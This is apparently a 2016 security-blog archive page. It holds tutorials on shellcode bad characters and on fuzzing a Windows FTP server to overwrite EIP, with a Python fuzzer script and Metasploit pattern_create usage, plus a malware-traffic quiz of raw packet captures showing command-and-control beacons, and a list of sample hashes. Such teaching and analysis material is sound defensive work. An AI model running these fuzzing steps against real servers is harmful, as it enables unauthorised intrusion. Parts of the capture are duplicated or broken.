Monthly Archives: August 2016

Writing Shellcode for Buffer Overflows – Avoiding Bad Characters

Depending on the application, vulnerability type, and protocols in use, there may be certain characters that are considered “bad” and should not be used in your buffer, return address, or shellcode. One example of a common bad character (especially in buffer overflows caused by unchecked string copy operations) is the null byte (0x00). This character is considered bad because a null byte is also used to terminate a string copy operation, which would effectively truncate our buffer to wherever the first null byte appears. Another example of a bad character, specific to the POP3 PASS command, is the carriage return (0x0D), which signifies to the application that the end of the password has been reached.

An experienced exploit writer knows to check for bad characters,to prevent future problems. An easy way to do this is to send all possible characters, from 0x00 to 0xff, as part of our buffer, and see how these characters are dealt with by the application, after the crash occurs.

If you review the resulting memory dump from your fuzzing and check the ESP register and see the character 0x0A you’ll notice it truncated the rest of the buffer that comes after it.

Once you identify that the 0x0A character is a Line Feed, which is a bad character, in this case, for the same reasons that a Carriage Return is bad. We remove the \x0A character from our list, and resend the payload.
To summarize, our buffer should not include in any way the following characters: 0x00, 0x0A, 0x0D.

Share Button

Fuzzing Programs to find Windows Buffer Overflows – Bypass ASLR & DEP – Controlling and Overwritting EIP

Modern Windows Buffer Overflows and Techniques

Most Windows applications are complied using Data Execution Prevention (DEP) or Address Space Layout Randomization (ASLR) support, which makes the exploitation process a lot harder as we will have to bypass these internal security mechanisms.

These memory protections were implemented in Microsoft Windows 7, (DEP) is a set of hardware, and software, technologies that perform additional checks on memory, to help prevent malicious code from running on a system. The primary benefit of DEP is to help prevent code execution from data pages, by raising an exception, when execution occurs.

ASLR randomizes the base addresses of loaded applications, and DLLs, every time the Operating System is booted.

For us to successfully buffer overflow an application we have to take control of the Extended Instruction Pointer (EIP) register. Let’s say we are exploiting a vulnerability in serv-u FTPD which crashes when we send 3000 A’s to the daemon and we end up overwriting EIP with our input buffer of A’s (the hex equivalent of the letter A is \x41). The EIP register controls the execution so this is the most important aspect for this to work.

We can use a simple python script to connect to the FTP server and send the A’s to create the crash:

#!/usr/bin/python
import socket
# Create an array of buffers, from 1 to 5900, with increments of 200.
buffer=[“A”]
counter=100
while len(buffer) <= 30:
buffer.append(“A”*counter)
counter=counter+200
for string in buffer:
print “Fuzzing PASS with %s bytes” % len(string)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((‘192.168.1.100’,21))
s.recv(1024)
s.send(‘USER anonymous\r\n’)
s.recv(1024)
s.send(‘PASS ‘ + string + ‘\r\n’)
s.send(‘QUIT\r\n’)
s.close()

This means that if we craft our exploit buffer carefully, we might be able to divert the execution of the program to a place of our choosing, such as a into the memory where we can introduce some reverse shell code, as part of our buffer. We also need to pay particularly close attention to the value of Extended Stack Pointer (ESP) at crash time.

While fuzzing the application you will want to launch Immunity debugger and monitor the value of these registers as we fuzz the application.

We know that the program will crash and EIP will be overwritten when we send 3000 A’s to the program so we much locate those 4 As that overwrite our EIP register in the buffer. There are a few ways of doing this, the first one would be:

Binary Tree Analysis
Instead of 3000 A’s, we send 1500 A’s and 1500 B’s. If EIP is overwritten by B’s, we know the four bytes reside in the second half of the buffer. We then change the 1500 B’s to 750 B’s and 750 C’s, and send the buffer again. If EIP is overwritten by C’s, we know that the four bytes reside in the 2250–3000 byte range. Continue splitting the specific buffer until we reach the exact four bytes that overwrite EIP. Mathematically, this should happen in seven iterations.

Sending a Unique String
The faster method of identifying these four bytes is to send a unique string of 3000 bytes, identify the 4 bytes that overwrite EIP, and then locate those four bytes in our unique buffer. pattern_create.rb is a Ruby tool for creating and locating such buffers, and can be found as part of the Metasploit Framework exploit development scripts.

root@computersecurity:~# find / -name pattern_create*
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb
root@computersecurity:~# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb 3000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3A

 

Share Button

ANSWERS – Malware PCAP Traffic Analysis – Can you name the different types of malware? 2016-08-27

Here are the files that were executed to generate the traffic and pcap in the previous post:

 

Eorezo – sunnyday.exe

https://malwr.com/analysis/YzcxYTM0MzYxNGUyNDBjZjkyZjdlYzAyNzdkMTg5OWU/
https://virustotal.com/en/file/d1ae1454cca36dce4a687846ec394c542b13e829755c40653fbd495d95b02197/analysis/1472172878/

Farfli – netstream.exe

https://virustotal.com/en/file/969063116b1c717cd07015e04ecd6c2a6ad883da7dbcd2a4cd157100fa9c7b50/analysis/1472173093/

Citidel

https://virustotal.com/en/file/0765a0d3e6349761704d837f0d0a873a50a7e91a6efda972d1e82cf18df0ecbd/analysis/1472173251/

SHA256:     0765a0d3e6349761704d837f0d0a873a50a7e91a6efda972d1e82cf18df0ecbd
File name:     PROTESTO.exe
Detection ratio:     40 / 54
Analysis date:     2016-08-26 01:00:51 UTC ( 0 minutes ago )

Banking Trojan CRDF.Trojan.Trojan-Spy.Banker.Citadel109468358

SHA256:     3903a5ba4a893621c272bde6bfc9407b8f4595e8965b907e22fe4a1ac9f7b535
File name:     us.exe
Detection ratio:     47 / 56
Analysis date:     2016-08-26 01:03:48 UTC ( 0 minutes ago )

ZBOT / Banking Trojan

SHA256:     a32468ee49dad05def0fabc79b44b053490d8ff663ee95007d61bb47a7024bc7
File name:     inst1.exe
Detection ratio:     38 / 53

Papras / Password Stealer / Banking Trojan
Eorezo – sunnyday.exe

https://malwr.com/analysis/YzcxYTM0MzYxNGUyNDBjZjkyZjdlYzAyNzdkMTg5OWU/
https://virustotal.com/en/file/d1ae1454cca36dce4a687846ec394c542b13e829755c40653fbd495d95b02197/analysis/1472172878/

Farfli – netstream.exe

https://virustotal.com/en/file/969063116b1c717cd07015e04ecd6c2a6ad883da7dbcd2a4cd157100fa9c7b50/analysis/1472173093/

Citidel

https://virustotal.com/en/file/0765a0d3e6349761704d837f0d0a873a50a7e91a6efda972d1e82cf18df0ecbd/analysis/1472173251/

SHA256:     0765a0d3e6349761704d837f0d0a873a50a7e91a6efda972d1e82cf18df0ecbd
File name:     PROTESTO.exe
Detection ratio:     40 / 54
Analysis date:     2016-08-26 01:00:51 UTC ( 0 minutes ago )

Banking Trojan CRDF.Trojan.Trojan-Spy.Banker.Citadel109468358

SHA256:     3903a5ba4a893621c272bde6bfc9407b8f4595e8965b907e22fe4a1ac9f7b535
File name:     us.exe
Detection ratio:     47 / 56
Analysis date:     2016-08-26 01:03:48 UTC ( 0 minutes ago )

ZBOT / Banking Trojan

SHA256:     a32468ee49dad05def0fabc79b44b053490d8ff663ee95007d61bb47a7024bc7
File name:     inst1.exe
Detection ratio:     38 / 53

Papras / Password Stealer / Banking Trojan

SHA256:     ded40777eac5bfbb4c7a18108fee9023479ad94ebbe301dfaf31805d7612e8ae
File name:     inst3.exe
Detection ratio:     39 / 55
Analysis date:     2016-08-26 01:08:30 UTC ( 0 minutes ago )

https://www.sophos.com/en-us/threat-center/threat-analyses/adware-and-puas/Eorezo/detailed-analysis.aspx

SHA256:     ded40777eac5bfbb4c7a18108fee9023479ad94ebbe301dfaf31805d7612e8ae
File name:     inst3.exe
Detection ratio:     39 / 55
Analysis date:     2016-08-26 01:08:30 UTC ( 0 minutes ago )

https://www.sophos.com/en-us/threat-center/threat-analyses/adware-and-puas/Eorezo/detailed-analysis.aspx

Share Button

Malware PCAP Traffic Analysis – Can you name the different types of malware? 2016-08-27

Be careful, it might not all be malware, adware, PUPs and innocuous traffic is in play.

Download PCAP : netstream

VM executables used will be included in the next post.

 

2016-08-25 20:40:37.831293 IP 192.168.1.102.51776 > 37.187.148.135.80: Flags [P.], seq 0:267, ack 1, win 256, length 267: HTTP: GET /cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US HTTP/1.1
E..3?…..~^…f%….@.P.._.p?..P…^…GET /cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: prof.eorezo.com
Connection: Keep-Alive

2016-08-25 20:40:37.939899 IP 192.168.1.102.51776 > 37.187.148.135.80: Flags [.], ack 1279, win 251, length 0
E..(?……h…f%….@.P..`.p?  .P….”……..
2016-08-25 20:40:37.943675 IP 192.168.1.102.51776 > 37.187.148.135.80: Flags [F.], seq 267, ack 1279, win 251, length 0
E..(?……g…f%….@.P..`.p?  .P….!……..
2016-08-25 20:40:38.141806 IP 192.168.1.102.51777 > 151.80.21.143.80: Flags [S], seq 3409745412, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4?.@…K….f.P…A.P.<…….. ..O…………..
2016-08-25 20:40:38.233133 IP 192.168.1.102.51777 > 151.80.21.143.80: Flags [.], ack 1250113124, win 256, length 0
E..(?……….f.P…A.P.<..J.6dP….+……..
2016-08-25 20:40:38.237062 IP 192.168.1.102.51777 > 151.80.21.143.80: Flags [P.], seq 0:313, ack 1, win 256, length 313: HTTP: GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=243783&tag=EN_SUNTR0021_INSTALL_INI HTTP/1.1
E..a?……….f.P…A.P.<..J.6dP…….GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=243783&tag=EN_SUNTR0021_INSTALL_INI HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive

2016-08-25 20:40:47.118444 IP 192.168.1.102.51778 > 37.48.104.171.53: Flags [S], seq 1587645888, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4o.@…;/…f%0h..B.5^……… .HM…………..
2016-08-25 20:40:47.753813 IP 192.168.1.102.51778 > 37.48.104.171.53: Flags [S], seq 1587645888, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4o.@…;….f%0h..B.5^……… .HM…………..
2016-08-25 20:40:48.383911 IP 192.168.1.102.51778 > 37.48.104.171.53: Flags [S], seq 1587645888, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0o.@…;1…f%0h..B.5^…….p. .\\……….
2016-08-25 20:40:49.059816 IP 192.168.1.102.51779 > 37.48.104.171.53: Flags [S], seq 756890149, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4o.@…;,…f%0h..C.5-.:%…… ..k…………..
2016-08-25 20:40:49.338099 IP 192.168.1.102.12102 > 88.198.80.173.22638: UDP, length 50
E..Ne…..i8…fX.P./FXn.:.B(.(…e.8X….e…J…      ….e..?\./.;@w..K.-.JRh..]
2016-08-25 20:40:49.712951 IP 192.168.1.102.51779 > 37.48.104.171.53: Flags [S], seq 756890149, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4o.@…;+…f%0h..C.5-.:%…… ..k…………..
2016-08-25 20:40:50.332987 IP 192.168.1.102.51779 > 37.48.104.171.53: Flags [S], seq 756890149, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0o.@…;….f%0h..C.5-.:%….p. ..z……….
2016-08-25 20:40:50.919291 IP 192.168.1.102.51780 > 37.48.104.171.53: Flags [S], seq 3717442142, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4o.@…;)…f%0h..D.5…^…… ……………..
2016-08-25 20:40:50.931997 IP 192.168.1.102.63747 > 209.85.201.125.5222: Flags [.], ack 54, win 253, length 0
E..(}4….`….f.U.}…f.7 oN.g’P………….
2016-08-25 20:40:51.386024 IP 192.168.1.102.63735 > 108.168.236.116.80: Flags [.], ack 73, win 252, length 0
E..(n3…..q…fl..t…P..Cl.j.[P…t7……..
2016-08-25 20:40:51.547051 IP 192.168.1.102.51780 > 37.48.104.171.53: Flags [S], seq 3717442142, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4o.@…;(…f%0h..D.5…^…… ……………..
2016-08-25 20:40:52.183113 IP 192.168.1.102.51780 > 37.48.104.171.53: Flags [S], seq 3717442142, win 8192, options [mss 1460,nop,nop,sackOK], length 0
E..0o.@…;+…f%0h..D.5…^….p. ………….
2016-08-25 20:40:52.338366 IP 192.168.1.102.12102 > 82.22.183.182.36659: UDP, length 52
E..P3…..:….fR…/F.3.<..yk.TE…rY….sq&..mg.b+…d.D.];=..
….o…9..9Q.”

2016-08-25 20:40:53.651836 IP 192.168.1.102.51782 > 37.187.148.135.80: Flags [P.], seq 0:663, ack 1, win 256, length 663: HTTP: POST /cgi-bin/get_protect.cgi HTTP/1.1
E…?…..|….f%….F.P…?~…P…….POST /cgi-bin/get_protect.cgi HTTP/1.1
x-spidermessenger-crypted: 2
x-spidermessenger-crc32: 564053523
x-spidermessenger-length: 280
Content-Type: text/*
User-Agent: sun21-SunnyDay21
Host: prof.youandmeandmeandyouhihi.com
Content-Length: 386
Cache-Control: no-cache

ujXl2iaEv38JRlMCJUzLFCyglD0cQAQgE6EF56dWsz5OEBIEPEaaQ4ORDT3wc9vQbsZQLvQLyIGIKjW%2Fl4u3fdbbAMvHSB3Y8rHY6C15iy1v4T3HVwJHvnfvkcvsRH%2FwMwmTE0grv4DsJ%2ByvnMOf49J6q1ePUb8IejjsoHzBt3u6zWDwi57jEdnwDanJbVR9%2FQ6kiGKgMRlYm2VATvtoIK%2FXh1ewSC2acmrJpK8FPpDO5X4U8U%2BhVOQYKnve01SqePzC0jOBAaoCZYqrtet4eSNXBC58haWj9YO4CJ%2F4%2FM4Nav4noGSVy1Qbz81UE7k9%2BS0EqRjvZe%2FEFJL56ZEExcv7I8L7SqCbMzmWt19hp0A%3D
2016-08-25 20:40:53.755451 IP 192.168.1.102.51782 > 37.187.148.135.80: Flags [.], ack 2442, win 256, length 0
E..(?……a…f%….F.P….~..’P………….
2016-08-25 20:40:53.755850 IP 192.168.1.102.51782 > 37.187.148.135.80: Flags [.], ack 2443, win 256, length 0
E..(?……`…f%….F.P….~..(P………….
2016-08-25 20:40:53.936963 IP 192.168.1.102.51782 > 37.187.148.135.80: Flags [F.], seq 663, ack 2443, win 256, length 0
E..(? ….._…f%….F.P….~..(P………….
2016-08-25 20:40:54.169503 IP 192.168.1.102.51783 > 151.80.21.143.80: Flags [S], seq 2595205625, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4@.@…K….f.P…G.P………. ……………..
2016-08-25 20:40:54.267077 IP 192.168.1.102.51783 > 151.80.21.143.80: Flags [.], ack 1240556016, win 256, length 0
E..(@……….f.P…G.P….I.a.P…|………
2016-08-25 20:40:54.267608 IP 192.168.1.102.51783 > 151.80.21.143.80: Flags [P.], seq 0:313, ack 1, win 256, length 313: HTTP: GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=243783&tag=EN_SUNTR0021_INSTALL_F11 HTTP/1.1
E..a@……….f.P…G.P….I.a.P…….GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=243783&tag=EN_SUNTR0021_INSTALL_F11 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive

2016-08-25 20:40:54.325234 IP 192.168.1.102.51781 > 37.187.148.118.443: Flags [P.], seq 0:235, ack 1, win 256, length 235
E…S…..j….f%..v.E……..9.P………………W…,…|_M.]]………..>..J…..\…
.9.8………5……………
…     .3.2…..E.D…../…A……………….       ……………]………upd.adskyforever.com………
.4.2……………..   .
…………………………

2016-08-25 20:40:54.267608 IP 192.168.1.102.51783 > 151.80.21.143.80: Flags [P.], seq 0:313, ack 1, win 256, length 313: HTTP: GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=24
3783&tag=EN_SUNTR0021_INSTALL_F11 HTTP/1.1
E..a@……….f.P…G.P….I.a.P…….GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=243783&tag=EN_SUNTR0021_INSTALL_F11 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive

2016-08-25 20:40:54.325234 IP 192.168.1.102.51781 > 37.187.148.118.443: Flags [P.], seq 0:235, ack 1, win 256, length 235
E…S…..j….f%..v.E……..9.P………………W…,…|_M.]]………..>..J…..\…
.9.8………5……………
…     .3.2…..E.D…../…A……………….       ……………]………upd.adskyforever.com………
.4.2……………..   .
…………………………
2016-08-25 20:40:54.365617 IP 192.168.1.102.51783 > 151.80.21.143.80: Flags [F.], seq 313, ack 881, win 253, length 0
E..(@……….f.P…G.P…3I.e`P…x………
2016-08-25 20:40:54.366167 IP 192.168.1.102.51783 > 151.80.21.143.80: Flags [.], ack 882, win 253, length 0
E..(@……….f.P…G.P…4I.eaP…x………
2016-08-25 20:40:54.370115 IP 192.168.1.102.51784 > 151.80.21.143.80: Flags [S], seq 4015338610, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4@.@…K….f.P…H.P.U4r…… ……………..
2016-08-25 20:40:54.420141 IP 192.168.1.102.51781 > 37.187.148.118.443: Flags [.], ack 1, win 256, options [nop,nop,sack 1 {1461:2718}], length 0
E..4S.@…*….f%..v.E……..9……1…..
..?o..DX
2016-08-25 20:40:54.420536 IP 192.168.1.102.51781 > 37.187.148.118.443: Flags [.], ack 2718, win 256, length 0
E..(S…..j….f%..v.E……..DXP………….
2016-08-25 20:40:54.439037 IP 192.168.1.102.51781 > 37.187.148.118.443: Flags [P.], seq 235:369, ack 2718, win 256, length 134
E…S…..jw…f%..v.E……..DXP….}……F…BA………..,………..$’..N…Q.|..’3…O…U|.C.Q.)…….i…………..0@.n………1.>)….:X.R……].OG.b9..M.7y.).`|
2016-08-25 20:40:54.463188 IP 192.168.1.102.51784 > 151.80.21.143.80: Flags [.], ack 2683766345, win 256, length 0
E..(@……….f.P…H.P.U4s…IP….D……..
2016-08-25 20:40:54.463647 IP 192.168.1.102.51784 > 151.80.21.143.80: Flags [P.], seq 0:313, ack 1, win 256, length 313: HTTP: GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=243783&tag=EN_SUNTR0021_INSTALL_FIN HTTP/1.1
E..a@……….f.P…H.P.U4s…IP…….GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=243783&tag=EN_SUNTR0021_INSTALL_FIN HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive

2016-08-25 20:40:58.905556 IP 192.168.1.102.51787 > 87.236.19.58.80: Flags [.], ack 2856380214, win 64240, length 0
E..(x5…..f…fW..:.K.P…..@.6P………….
2016-08-25 20:40:58.906135 IP 192.168.1.102.51787 > 87.236.19.58.80: Flags [P.], seq 0:341, ack 1, win 64240, length 341: HTTP: POST /file.php HTTP/1.1
E..}x6………fW..:.K.P…..@.6P….{..POST /file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: qawsf1gy.bget.ru
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

Xi%.i….<_gDUB4…..E..I……D.&…X…….g]….2.}dz4.w.J.|5..<..ZqD.)o…..P,..o….|..b;..”f…P-..@…..2.X5.m…….-.”q..
2016-08-25 20:40:58.920785 IP 192.168.1.102.51788 > 87.236.19.58.80: Flags [.], ack 1603268971, win 64240, length 0
E..(x7…..d…fW..:.L.Pr…_..kP…h………
2016-08-25 20:40:58.921202 IP 192.168.1.102.51788 > 87.236.19.58.80: Flags [P.], seq 0:353, ack 1, win 64240, length 353: HTTP: POST /file.php HTTP/1.1
E…x8………fW..:.L.Pr…_..kP….$..POST /file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: qawsf1gy.bget.ru
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

..m.*d…`.7E…f.}..Spr@…!o..A..i….J….I.yX.C…8..:….W.a…….?..2D.0#g]…].v..=7b…..WcAV…. JL..\.fUh…4M}zUv.Y..C….y…F
J.
2016-08-25 20:40:59.107685 IP 192.168.1.102.51787 > 87.236.19.58.80: Flags [P.], seq 341:694, ack 519, win 63722, length 353: HTTP: POST /file.php HTTP/1.1
E…x9………fW..:.K.P.. ..@.<P….+..POST /file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: qawsf1gy.bget.ru
Content-Length: 142
Connection: Keep-Alive
Cache-Control: no-cache

..m.*d…`.7E…f.}..Spr@…!o..A..i….J….I.yX.C…8..:….W.a…….?..2D.0#g]…].v..=7b…..WcAV…. JL..\.fUh…4M}zUv.Y..C….y…F
J.
2016-08-25 20:40:59.107907 IP 192.168.1.102.51788 > 87.236.19.58.80: Flags [P.], seq 353:694, ack 519, win 63722, length 341: HTTP: POST /file.php HTTP/1.1
E..}x:………fW..:.L.Pr…_..qP…N…POST /file.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: qawsf1gy.bget.ru
Content-Length: 130
Connection: Keep-Alive
Cache-Control: no-cache

016-08-25 20:41:35.942852 IP 192.168.1.102.51421 > 92.111.175.125.22222: Flags [F.], seq 3197274254, ack 152215858, win 252, length 0
E..(U……….f\o.}..V…..    ..2P………….
2016-08-25 20:41:36.293772 IP 192.168.1.102.51421 > 92.111.175.125.22222: Flags [F.], seq 0, ack 1, win 252, length 0
E..(U……….f\o.}..V…..    ..2P………….
2016-08-25 20:41:36.894824 IP 192.168.1.102.51421 > 92.111.175.125.22222: Flags [F.], seq 0, ack 1, win 252, length 0
E..(U……….f\o.}..V…..    ..2P………….
2016-08-25 20:41:37.360053 IP 192.168.1.102.12102 > 88.198.80.173.22638: UDP, length 62
E..Ze…..i*…fX.P./FXn.F…b._…80./[…………..0.=u”….T..obM..1…..   …k..#>.X.#
2016-08-25 20:41:38.095908 IP 192.168.1.102.51421 > 92.111.175.125.22222: Flags [F.], seq 0, ack 1, win 252, length 0
E..(U……….f\o.}..V…..    ..2P………….
2016-08-25 20:41:40.360218 IP 192.168.1.102.12102 > 82.22.183.182.36659: UDP, length 57
E..U3…..:….fR…/F.3.A.iI.+P….&c..O..#..u.:……….’..
.W.d…`p.4….m^n….
2016-08-25 20:41:40.497053 IP 192.168.1.102.51421 > 92.111.175.125.22222: Flags [F.], seq 0, ack 1, win 252, length 0
E..(U……….f\o.}..V…..    ..2P………….
2016-08-25 20:41:42.663567 IP 192.168.1.102.51790 > 23.253.126.58.443: Flags [S], seq 117805912, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@……..f..~:.N…..X…… ..c…………..
2016-08-25 20:41:43.360410 IP 192.168.1.102.12102 > 210.133.208.78.11652: UDP, length 54
E..Rq…..d….f…N/F-..>….3.y…”.-..)_*…..L…r2…..$
H.T……………yb
2016-08-25 20:41:45.297334 IP 192.168.1.102.51421 > 92.111.175.125.22222: Flags [F.], seq 0, ack 1, win 252, length 0
E..(U……….f\o.}..V…..    ..2P………….

2016-08-25 20:42:49.622060 IP 192.168.1.102.51796 > 188.166.10.125.443: Flags [S], seq 2057745320, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4O.@…!….f..
}.T..z……… ……………..
2016-08-25 20:42:49.794120 IP 192.168.1.102.51796 > 188.166.10.125.443: Flags [.], ack 3954064400, win 260, length 0
E..(O…..a….f..
}.T..z…..<.P………….
2016-08-25 20:42:49.840829 IP 192.168.1.102.51796 > 188.166.10.125.443: Flags [P.], seq 0:77, ack 1, win 260, length 77
E..uO…..a….f..
}.T..z…..<.P………..H…D..W..b
Y.c.w.R…’O…:……R(..d……..
.       .d.b………c………
2016-08-25 20:42:50.068322 IP 192.168.1.102.51796 > 188.166.10.125.443: Flags [.], ack 748, win 257, length 0
E..(O…..a….f..
}.T..z…..>.P….K……..
2016-08-25 20:42:50.081419 IP 192.168.1.102.51796 > 188.166.10.125.443: Flags [P.], seq 77:267, ack 748, win 257, length 190
E…O…..a0…f..
}.T..z…..>.P…0……………J,z;….k..od.c..m..J.6……/…,Y..’…..#{..g…L..s..O.>s…….Q… j._=…S..i…q{..l.g.N….gf..l……L.u..|”.5H…. ………..(.S.!O….4……….o….S.U..I.0.l.Tx..
2016-08-25 20:42:50.299317 IP 192.168.1.102.51796 > 188.166.10.125.443: Flags [.], ack 799, win 257, length 0
E..(O…..a….f..
}.T..z…..?.P….Y……..
2016-08-25 20:42:50.452744 IP 192.168.1.102.51796 > 188.166.10.125.443: Flags [P.], seq 267:365, ack 799, win 257, length 98
E…O…..a….f..
}.T..z…..?.P…2………n…..sg=P..{..`..s*f……@-‘(l.&.l…h.[.._…-3g………..*.I.T9″……..(.7..gPm…….
2016-08-25 20:42:50.661372 IP 192.168.1.102.51796 > 188.166.10.125.443: Flags [F.], seq 365, ack 1676, win 260, length 0
E..(O…..a….f..
}.T..z…..B.P………….
2016-08-25 20:42:50.662103 IP 192.168.1.102.51797 > 188.166.10.125.443: Flags [S], seq 1111764833, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4O.@…!….f..
}.U..BD/a…… ..(…………..
2016-08-25 20:42:50.662234 IP 192.168.1.102.51798 > 188.166.10.125.443: Flags [S], seq 247285886, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4O.@…!….f..
}.V….H~…… ……………..
2016-08-25 20:42:50.833009 IP 192.168.1.102.51796 > 188.166.10.125.443: Flags [.], ack 1677, win 260, length 0
E..(O…..a….f..
}.T..z…..B.P………….
2016-08-25 20:42:50.834539 IP 192.168.1.102.51798 > 188.166.10.125.443: Flags [.], ack 4265457260, win 260, length 0
E..(O…..a….f..
}.V….H..=.lP…M………
2016-08-25 20:42:50.835151 IP 192.168.1.102.51798 > 188.166.10.125.443: Flags [P.], seq 0:109, ack 1, win 260, length 109
E…O…..ay…f..
}.V….H..=.lP….G……h…d..W..c..k.
P(..B……^.N.6..)..aC ..7w…U8………+…..f…$O………
.       .d.b………c………

2016-08-25 20:42:52.087758 IP 192.168.1.102.51797 > 188.166.10.125.443: Flags [.], ack 215796, win 1333, length 0
E..(P…..a….f..
}.U..BD3..2..P..5……….
2016-08-25 20:42:52.088179 IP 192.168.1.102.51797 > 188.166.10.125.443: Flags [.], ack 218316, win 1333, length 0
E..(P…..a….f..
}.U..BD3..2..P..5……….
2016-08-25 20:42:52.088938 IP 192.168.1.102.51797 > 188.166.10.125.443: Flags [.], ack 220836, win 1333, length 0
E..(P…..a….f..
}.U..BD3..2..P..5.@……..
2016-08-25 20:42:52.089497 IP 192.168.1.102.51797 > 188.166.10.125.443: Flags [.], ack 223356, win 1333, length 0
E..(P…..a….f..
}.U..BD3..2._P..5.h……..
2016-08-25 20:42:52.090208 IP 192.168.1.102.51797 > 188.166.10.125.443: Flags [.], ack 225876, win 1333, length 0
E..(P…..a….f..
}.U..BD3..2.7P..5}………
2016-08-25 20:42:52.090816 IP 192.168.1.102.51797 > 188.166.10.125.443: Flags [.], ack 228396, win 1333, length 0
E..(P…..a….f..
}.U..BD3..2..P..5s………
2016-08-25 20:42:52.091466 IP 192.168.1.102.51797 > 188.166.10.125.443: Flags [.], ack 230916, win 1333, length 0
E..(P…..a….f..
}.U..BD3..2..P..5i………
2016-08-25 20:42:52.092047 IP 192.168.1.102.51797 > 188.166.10.125.443: Flags [.], ack 233436, win 1333, length 0
E..(P…..a….f..
}.U..BD3..2..P..5`………
2016-08-25 20:42:52.093266 IP 192.168.1.102.51797 > 188.166.10.125.443: Flags [.], ack 235956, win 1333, length 0
E..(P…..a….f..
}.U..BD3..2..P..5V0……..
2016-08-25 20:42:52.093882 IP 192.168.1.102.51797 > 188.166.10.125.443: Flags [.], ack 238476, win 1333, length 0
E..(P…..a….f..
}.U..BD3..2.oP..5LX……..

2016-08-25 20:42:52.519472 IP 192.168.1.102.51800 > 92.63.111.173.80: Flags [S], seq 864782611, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4    .@…c….f\?o..X.P3……… .9……………
2016-08-25 20:42:52.681083 IP 192.168.1.102.51800 > 92.63.111.173.80: Flags [.], ack 2746851228, win 260, length 0
E..(    ……….f\?o..X.P3…….P…V7……..
2016-08-25 20:42:52.681582 IP 192.168.1.102.51800 > 92.63.111.173.80: Flags [P.], seq 0:343, ack 1, win 260, length 343: HTTP: GET /module/96df1c84c7fb13e880e399f9627e0db0 HTTP/1.1
E…    ……….f\?o..X.P3…….P….0..GET /module/96df1c84c7fb13e880e399f9627e0db0 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; WIN32)
Host: 92.63.111.173

2016-08-25 20:42:53.381648 IP 192.168.1.102.51800 > 92.63.111.173.80: Flags [.], ack 99559, win 260, length 0
E..(    ……….f\?o..X.P3..k..$.P………….
